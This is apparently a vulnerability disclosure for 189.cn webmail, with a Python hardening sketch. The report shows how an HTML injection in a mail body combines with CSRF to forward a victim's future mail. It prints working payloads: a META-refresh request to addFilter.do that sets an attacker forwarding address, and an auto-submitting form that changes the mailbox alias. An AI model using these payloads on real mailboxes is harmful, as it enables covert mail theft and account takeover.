A single email can take over all future mail in a China Telecom (189.cn) user's mailbox (and can even change the mailbox alias so the takeover is harder to notice)
The earlier report "One email can control the future emails of 21cn user mailboxes" covered personal mailboxes; here a 21CN enterprise mailbox is used as the example.
The attack chains two vulnerabilities:
1. The email body is not strictly filtered, so HTML attack code can be inserted into it.
2. Sensitive operations carry no CSRF token: adding a mail-forwarding rule (a GET request) and changing the user's mailbox alias (a POST request) can both be triggered cross-site.
Attack code for the GET request (create a mail-forwarding rule). Note: when the email is submitted through Burp Suite, the & separators in the attack code must be URL-encoded; otherwise the request is truncated at the first & and the rule is not created automatically.
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://webmail30.189.cn/w2/option/addFilter.do?name=all&condition=3005&senderInclude=1001&sender=&subjectInclude=1001&subject=&sizeCompare=1007&mailSize=&action=0&setLabelId=41167481&setBoxId=1&autoForward=test%40test.com&autoReply=&id=-1">
Replace test%40test.com (the URL-encoded form of test@test.com) with the address the victim's mail should be forwarded to.
Attack code for the POST request (change the mailbox alias):
<form action="https://e.189.cn/iframe/modifyAlias.do" name="form" method="post">
<input type="hidden" name="modifyAlias" value="name">
<input type="hidden" name="txtCurAlias" value="ori_emailname">
<input type="hidden" name="aliasName" value="new_emailname">
</form>
<script>document.forms.form.submit();</script>
ori_emailname is the user's current mailbox alias (username);
new_emailname is the alias it is to be changed to.
Save the preceding code as an HTML page on an attacker-controlled server, for example:
http://xxx.xxx.com/1.html
Then insert the following code into the email body. It fires as soon as the victim clicks the email to view it:
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://xxx.xxx.com/1.html">
The walkthrough below uses the GET method as the example. For the POST request that changes the mailbox alias, an intermediate page that auto-submits the form is additionally needed to make the attack fully automatic; see the code above.
First, look at the page for creating mail-forwarding rules. Capturing the request with Burp Suite shows that it is sent as a GET request.
Send the victim an email whose body is the attack code (the & separators in the attack code must be URL-encoded). The victim receives the email.
When the victim clicks the email, the page shows the response:
Rule created successfully
The victim only has to click the email to view its body; the only thing displayed on the page is that single response message, which is easy to overlook, so the harm is considerable.
Solution:
I. Whitelist-validate user input (restrict the HTML allowed in email bodies).
II. Sensitive operations should require a token so that the request parameters cannot be predicted, which prevents CSRF.
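As an added example (not 21CN's code and not part of the original report), the following Python sketch applies both fixes from the Solution list to the payloads shown above: a whitelist sanitizer for mail bodies that strips the injected META refresh, form and script, and a session-bound CSRF token that a hardened rule-creating handler requires while refusing GET. The handler, its parameter names and the token format are assumptions for illustration.

```python
"""Added hardening sketch for the two fixes in the Solution list (not 21CN's code).
1. Whitelist-filter HTML in mail bodies so an injected <meta http-equiv="refresh">,
   <form> or <script> is removed before webmail renders the body.
2. Require POST plus a session-bound CSRF token for state-changing operations, so the
   addFilter.do / modifyAlias.do requests in this report cannot be forged cross-site.
Handler, parameter and function names below are hypothetical."""
import hashlib
import hmac
import secrets
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Whitelist for mail bodies. Any other tag is dropped (its text is kept), which removes
# meta, form, input, script, iframe, object and every on* event-handler attribute.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "div", "span", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
ALLOWED_SCHEMES = ("http://", "https://", "mailto:")


class MailBodySanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._skip = 0  # >0 inside <script>/<style>: their text is dropped as well

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
            return
        if self._skip or tag not in ALLOWED_TAGS:
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            # Refuse javascript:, data: and protocol-relative URLs in href/src.
            if name in ("href", "src") and not value.lower().startswith(ALLOWED_SCHEMES):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS and tag not in ("br", "img"):
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))


def sanitize_mail_body(body_html):
    """Return body_html reduced to the whitelist above."""
    p = MailBodySanitizer()
    p.feed(body_html)
    p.close()
    return "".join(p.out)


def issue_csrf_token(secret, session_id):
    """nonce.HMAC(secret, session_id:nonce): unguessable and tied to one session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(secret, session_id, token):
    nonce, sep, mac = token.partition(".")
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return bool(sep) and hmac.compare_digest(mac, expected)


def handle_add_filter(method, params, session_id, secret):
    """Hypothetical hardened entry point for a rule-creating handler like addFilter.do.
    params is a parse_qs() dict; returns the HTTP status the request would receive."""
    if method != "POST":
        return "405"  # a <meta refresh> or <img> can only ever produce a GET
    if not verify_csrf_token(secret, session_id, params.get("token", [""])[0]):
        return "403"  # a forged cross-site POST has no valid token for this session
    return "200"


def params_of(url):
    """Query parameters of a URL as the handler sees them (note %40 decoded to @)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)


# Constructed inputs: the two payloads from this report and one benign body.
FORGED_GET = ("http://webmail30.189.cn/w2/option/addFilter.do?name=all&condition=3005"
              "&senderInclude=1001&sender=&subjectInclude=1001&subject=&sizeCompare=1007"
              "&mailSize=&action=0&setLabelId=41167481&setBoxId=1"
              "&autoForward=test%40test.com&autoReply=&id=-1")
META_PAYLOAD = f'<META HTTP-EQUIV="refresh" CONTENT="0; URL={FORGED_GET}">'
FORM_PAYLOAD = ('<form action="https://e.189.cn/iframe/modifyAlias.do" name="form" method="post">'
                '<input type="hidden" name="modifyAlias" value="name">'
                '<input type="hidden" name="txtCurAlias" value="ori_emailname">'
                '<input type="hidden" name="aliasName" value="new_emailname"></form>'
                '<script>document.forms.form.submit();</script>')
BENIGN = '<p>Hi <b>there</b><br><a href="https://example.com" onclick="x()">link</a></p>'

if __name__ == "__main__":
    secret, sid = secrets.token_bytes(32), "session-A"
    print(repr(sanitize_mail_body(META_PAYLOAD)), repr(sanitize_mail_body(FORM_PAYLOAD)))
    print(handle_add_filter("GET", params_of(FORGED_GET), sid, secret),
          handle_add_filter("POST", {"token": [issue_csrf_token(secret, sid)]}, sid, secret))
```

Run as a script, the two payloads from the report sanitize to empty strings while the benign body keeps its tags minus the onclick handler; the forged GET is refused with 405, the same parameters re-sent as a POST without a token get 403, and only a POST carrying a token issued for the same session is accepted. Binding the token to the session (rather than using a single static value) is what stops the attacker from predicting the parameters, which is the point of fix II.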